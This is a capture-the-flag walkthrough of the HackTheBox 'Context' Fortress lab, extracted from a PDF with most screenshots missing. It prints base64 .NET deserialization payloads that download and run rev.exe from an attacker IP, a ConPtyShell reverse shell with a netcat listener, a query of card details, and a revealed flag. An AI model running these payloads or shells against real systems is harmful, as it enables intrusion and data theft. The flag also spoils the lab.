Context_Fortress
Context_Fortress
10/05/2024
Enumeration phase
● But we have SSL!?
1
HackTheBox-Context
10/05/2024
2
HackTheBox-Context
10/05/2024
But lets not get ahead just yet as per usual i check the
website where the first flag is in the source code of the
page https://10.13.37.12/Home/Staff
3
HackTheBox-Context
10/05/2024
4
HackTheBox-Context
10/05/2024
5
HackTheBox-Context
10/05/2024
Flag:
CONTEXT{d0_it_st0p_it_br34k_it_f1x_it}
Outlook Enum
6
HackTheBox-Context
10/05/2024
7
HackTheBox-Context
10/05/2024
8
HackTheBox-Context
10/05/2024
9
HackTheBox-Context
10/05/2024
Result :
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBjdXJsIDEwLjEwLjE2LjU6ODAwL3Jldi5leGU
gLW8gQzpcXFByb2dyYW1EYXRhXFxyZXYuZXhlJwogIC
AgICAgIH0KICAgIH0KfQ==
10
HackTheBox-Context
10/05/2024
11
HackTheBox-Context
10/05/2024
The base64:
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBDOlxcUHJvZ3JhbURhdGFcXHJldi5leGUnCi
AgICAgICAgfQogICAgfQp9
12
HackTheBox-Context
10/05/2024
And now inject it to the Profile cookie again after you setup
the listener
BOOM!!
Next flag is
13
HackTheBox-Context
10/05/2024
Moving on i logged
Found This
14
HackTheBox-Context
10/05/2024
15
HackTheBox-Context
10/05/2024
SELECT * FROM
[web\clients].[clients].[dbo].[card_details
];
16
HackTheBox-Context
10/05/2024
17
HackTheBox-Context
10/05/2024
18
HackTheBox-Context
10/05/2024
19
HackTheBox-Context
10/05/2024
Anywho for us
In powershell type :
(Get-Date).ToString("yyyy-MM-dd") + "-thisisleet"
For the password
git clone
https://github.com/antonioCoco/ConPtyShell.
git
20
HackTheBox-Context
10/05/2024
Get-ItemPropertyValue
'HKLM:\SOFTWARE\Microsoft\NET Framework
Setup\NDP\v4\Full' -Name Release
21
HackTheBox-Context
10/05/2024
Attacker Machine:
stty raw -echo; (stty size; cat) | nc -lvnp 443
Target Machine
.\ConPtyShell.exe 10.10.16.5 443
22
HackTheBox-Context
10/05/2024
23
HackTheBox-Context
10/05/2024
And that’s it for the last flag now that we have given
jay.teignton localadmin privs we use evil-winrm once more
And that’s it for this fortress was really fun to play hope
you enjoy it as well
24